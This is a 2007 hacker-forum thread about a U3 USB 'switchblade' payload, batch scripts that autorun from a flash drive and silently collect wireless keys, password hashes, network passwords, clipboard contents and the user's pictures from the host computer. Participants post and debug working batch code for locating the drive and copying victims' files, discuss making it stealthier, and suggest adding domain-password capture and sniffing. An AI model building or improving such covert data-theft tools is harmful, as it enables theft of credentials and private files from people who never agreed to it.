GonZor Posted July 9, 2007

> Thanks Gonzor. Could be interesting for next versions add some features like try to catch domain passwords, (I don't know if this could be possible) or install any kind of sniffer for to get "on the fly" passwords. another idea its to add a Keylogger... what do you think about?

The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload.

marc Posted July 9, 2007

darkjoker, I received that error a few times, but mainly in a media centre PC. What OS gives you that? A Google search seems to show results for all kinds of USB devices, and therefore I do not think it's the payload that gives that problem.

Erdnase, can I guess where you got your nickname from? Anything to do with S.W.Erdnase's expert at the card table?

darkjoker Posted July 10, 2007

The OS I have is Windows XP Pro

herman Posted July 10, 2007

I also get the "Windows - No disk Exception Processing Message c00000013 Parameters 75b4bf7c 75b4bf7c" error, and it doesn't disappear until I've clicked any alternative like 10 times. The log is written, but it isn't very stealth when you get that error...

Win XP, sp2
Cruzer Titanium 2 GB (u3)

marc Posted July 10, 2007

Some websites regarding this error:

http://wook.wordpress.com/2007/06/25/excep...6bf9c-75b6bf9c/
http://forums.techguy.org/business-applica...ocessing-3.html
http://my.opera.com/opera-usb/forums/topic.dml?id=187458

Seems something to do with Norton and/or quicktime. Can everyone who is getting this error please tell me what AV they have (if any), and their status with quicktime being installed?

darkjoker Posted July 10, 2007

I have AVG and I do have quicktime installed.

P.S. How do I make it stealth? Cause it pops up cmd

Erdnase Posted July 11, 2007

> Erdnase, can I guess where you got your nickname from? Anything to do with S.W.Erdnase's expert at the card table?

Right Marc... one of my favorite books and other of my passions

marc Posted July 12, 2007

Same here Erdnase. I've been a semi-professional working magician from a 14 year interest in magic :).

herman Posted July 12, 2007

Hehe, funny is the fact that I also have been into magic. Seems like magicians have a strong attraction to hak5

OnT: I do not have Norton or any other Symantec software but I do have quicktime installed. I'm so sad that I get this error message, otherwise this would be the perfect payload for me. Really hope Gonzor finds out what's going on and uploads a stable and non-bugging version soon.

Keep up the good work!

marc Posted July 14, 2007

Whoa. All magicians in the house, give me your MSN Messenger (preferably, or iChat/AIM) addresses! Sorry, for this offtopic stuff.

Me and Gonzor are working on a new part of the payload. I won't give much away, I'll let Gonzor do that, but it seems to be quite useful, and I'm sure more will be told as we develop it.

G-Stress Posted July 17, 2007

@ GonZor

Was wondering if you or anyone could help me with something. I'm looking at your go.bat file and it is coded very nicely. A bit more complex than the original switchblade. Say I want to have my usb stick (memorex mini 256 travel drive) just have one job to do, to dump wireless keys. I flash the drive with the universal customizer with a file to autorun wifi.bat and including in that file:

    Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
    echo **********[Dump Wireless Key]******* >> ....Documentslogfiles%computername%.log 2>&1
    Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
    .wkv.exe /stext "....Documentslogfiles%computername%_wk.log" >> ....Documentslogfiles%computername%.log 2>&1
    copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_wk.log* ....Documentslogfiles%computername%.log >> nul
    del /f /q "....Documentslogfiles%computername%_wk.log" >nul

The U3 Partition is set up as follows:

autorun.ini [tells to run autoexec.bat]
autoexec.bat [tells to run FilesAutoRun.bat]

Files Dir. Contents:

FilesAutoRun.bat [calls wifi.bat]
Fileswifi.bat
Fileswkv.exe

My problem is it will not write to the removable part of the drive for nothing in the world. I'm sure it is something with the path part of the code. I've tried changing it to:

.. .... ..

Still no luck. Any suggestions? Anybody?

GonZor Posted July 17, 2007

You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a dat file which is on the flash partition. Normally you will need to create the file manually but SBConfig.exe does this for you when you use my payload.

    :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
    FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
        IF EXIST %%i:NUL.EXT (
            :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
            IF EXIST %%i:SystemSRCdrv.dat (
            SET fd=%%i:System
                )
        )
    )
    :: CREATE LOG DIRECTORY
        IF NOT EXIST %fd%Logs%computername% (
            MD %fd%Logs%computername%
            )
    :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
        DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###"
        SET /p count=<"%fd%SRC###"
    :: SET LOG PATH
        SET log="%fd%Logs%computername%%computername%-[%count%].log"

Create a file on your flash partition SystemSRCdrv.dat. Place that at the top of your go.bat, now when you refer to your log file use %log%, this will expand to X:SystemLogs%computername%%computername%-[%count%].log where X is the flash drive letter and count is the amount of logs for that computer in the folder.

G-Stress Posted July 17, 2007

Nice... guess that makes sense, still a bit complex for me to fully understand it just by looking at it, but I'm gonna hopefully get to mess around with it tonight:)

beakmyn Posted July 18, 2007

Nice job!

I'm doing some tweaks to it now and compiling the batch files to executables, etc. But one thing struck me as odd and most likely it's my relatively vacant use of batch files.

You seem to use the " mark singularly, such as:

    SET U3="%%i:SRC

or

    IF EXIST %include%1.dat" (

What is the reason for this? Typically I've seen the use of the as an escape character and I'm used to seeing the " being used in pairs to enclose items with spaces or use literal meaning.

Just curious.

GonZor Posted July 19, 2007

In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally if I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)

    SET include="G:SRCInclude
    IF EXIST %include%0.dat"

When the second line is expanded it will look like this

    "G:SRCInclude0.dat"

Note the " on either end. If I were to enclose each in " like so

    SET include="G:SRCInclude"
    IF EXIST "%include%0.dat"

When the second line is expanded it will look like this, and fail

    ""G:SRCInclude"0.dat"

To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.

Sorry about the rough quick explanation, if it doesn't make sense I can attempt another explanation after I've had some sleep.

> I'm doing some tweaks to it now and compiling the batch files to executables, etc.

I'd love to take a look at the tweaks you've made, as well as the executable. What language?

G-Stress Posted July 19, 2007

Ok GonZor, I'm really trying to understand this part of your code and I think I got it.

    :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
    FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

Searches every drive letter for possible removable flash drive

        IF EXIST %%i:NUL.EXT (

Searches for the drive letter defined as %%i with a null value extension

            :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
            IF EXIST %%i:SystemSRCdrv.dat (
            SET fd=%%i:System
                )

Looks for a specific file in order to identify the drive in a directory SystemSRCdrv.dat

If that's the case what exactly is fd in "SET fd=%%iSystem"

beakmyn Posted July 19, 2007

> In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally if I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)
>
>     SET include="G:SRCInclude
>     IF EXIST %include%0.dat"
>
> When the second line is expanded it will look like this
>
>     "G:SRCInclude0.dat"
>
> Note the " on either end. If I were to enclose each in " like so
>
>     SET include="G:SRCInclude"
>     IF EXIST "%include%0.dat"
>
> When the second line is expanded it will look like this, and fail
>
>     ""G:SRCInclude"0.dat"
>
> To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.
>
> Sorry about the rough quick explanation, if it doesn't make sense I can attempt another explanation after I've had some sleep.
>
> > I'm doing some tweaks to it now and compiling the batch files to executables, etc.
>
> I'd love to take a look at the tweaks you've made, as well as the executable. What language?

It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some cases 3 ", which is what I expected to see in your code. But that tends to muck things up so instead I'll use chr(34) or equivalent and concatenation. I guess the batch file environment is more forgiving being an interpreted language but it makes the syntax highlighting in ExeScript goofing. That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with an exe wrapper. Not a real executable, yet.

One thing I've done is changed the layout for the log file:

    ECHO +-----------------------------------+ >> %log% 2>&1
    ECHO |     [System info]      | >> %log% 2>&1
    ECHO +-----------------------------------+ >> %log% 2>&1

I find the above easier on the eyes than the old ***** method.

I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when it's done. The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather than flash.

I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.

beakmyn Posted July 21, 2007

Found the following issues:

| was being used as a piped command where I think your intention was for it to be a pipe character.

If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort, retry, fail.

Count script sometimes returns "volume in drive d is removable" (where d is variable). This screws up the file name and you get computername - [volume in drive d is removable].log

I'm investigating root cause.

G-Stress Posted July 26, 2007

@ GonZor,

Using your script with file.exe and it isn't working, am I doing something wrong?

    @echo off
    :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
    FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
        :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
        IF EXIST %%i:SystemSRCdrv.dat (
        SET fd=%%i:SystemSRC
                )
        )
    :: CREATE LOG DIRECTORY
        IF NOT EXIST %fd%Logs%computername% (
            MD %fd%Logs%computername%
            )
    :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG
        DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###"
        SET /p count=<"%fd%SRC###"
    :: SET LOG PATH
        SET log="%fd%Logs%computername%%computername%-[%count%].log"
    :: CREATE PIC DIRECTORY
        IF NOT EXIST %fd%Documents%computername%Pictures (
            MD %fd%Documents%computername%Pictures
            )
    file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "Documents%computername%Pictures" /I /P
    file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "Documents%computername%Pictures" /I /P
    file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "Documents%computername%Pictures" /I /P

GonZor Posted July 26, 2007

> @ GonZor, Using your script with file.exe and it isn't working, am I doing something wrong?

To be honest I have never used file.exe so I am unfamiliar with how it's used but looking at your code, I am going to assume the last three lines should look like this:

    file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "%fd%Documents%computername%Pictures" /I /P
    file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "%fd%Documents%computername%Pictures" /I /P
    file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "%fd%Documents%computername%Pictures" /I /P

Assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. The problem was you were saying the destination was on the CD partition (which you obviously can't write to a CDFS partition).

LBlinkinbiz Posted July 26, 2007

Hey Gonzor,

Just wanna report in some personal bug feedback. I am getting this message:

    ======================
    Windows - No Disk             X
    ======================
    X  There is no disk in the drive.
       Please insert a disk into drive.
    |Cancel| |Try Again| |Continue|

And it is the cmd.exe process that is running during this error. This also occurs when Netpass runs (even when netpass is disabled [WTF?])

Otherwise, the rest of the payload works like a charm. Hacksaw works perfectly - just as long as I log in and stuff like you said.

Keep up the good work!

G-Stress Posted July 26, 2007

@ GonZor,

Ahhh, makes total sense. Thanks man, really appreciate it. I'm gonna definitely try that out tonight:)

Oh yea I forgot, the logs, it does create log folders, but doesn't actually create any logs. It creates the folders in the SRC directory, but I'll mess around with that tonight also.

G-Stress Posted July 27, 2007

Just one ? a little confused. Still not working, but it could just be file.exe issue, but according to the following code:

    @echo off
    :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
    FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
        :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
        IF EXIST %%i:SystemSRCdrv.dat (
        SET fd=%%i:SystemSRC
                )
        )

It looks to me like you're defining the flash partition as drive i: I don't see how it gets defined as %fd%

GonZor Posted July 27, 2007

> It looks to me like you're defining the flash partition as drive i: I don't see how it gets defined as %fd%

Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually.

    :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
    FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (

FOR %variable IN (set) DO <command>

%variable specifies a single letter variable (my chosen variable %%i)
(set) specifies what the variable will be each time (in this case the alphabet)
<command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability)

        :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC
        IF EXIST %%i:SystemSRCdrv.dat (

The first command for each variable, IF EXIST <file> <command>

<file> specifies the file to search for (in this case we are searching for the file SystemSRCdrv.dat but this can be changed to any file)
<command> specifies the command to do if the file exists (once again I used an open bracket for readability, I find it easier)

            SET fd=%%i:SystemSRC

This is the command to be completed once the file is found to exist, SET <variable>=<string>

<variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%)
<string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter & the folder path SystemSRC)

            )
        )

These are just the closing brackets to both statements, first closing the IF EXIST command and second closing the FOR command. This could be written as one line but for readability I use the brackets.

I hope that made sense but time now for some sleep :shock:

G-Stress Posted July 30, 2007

Thanks a lot GonZor, makes much more sense now. Appreciate you takin the time to explain each step individually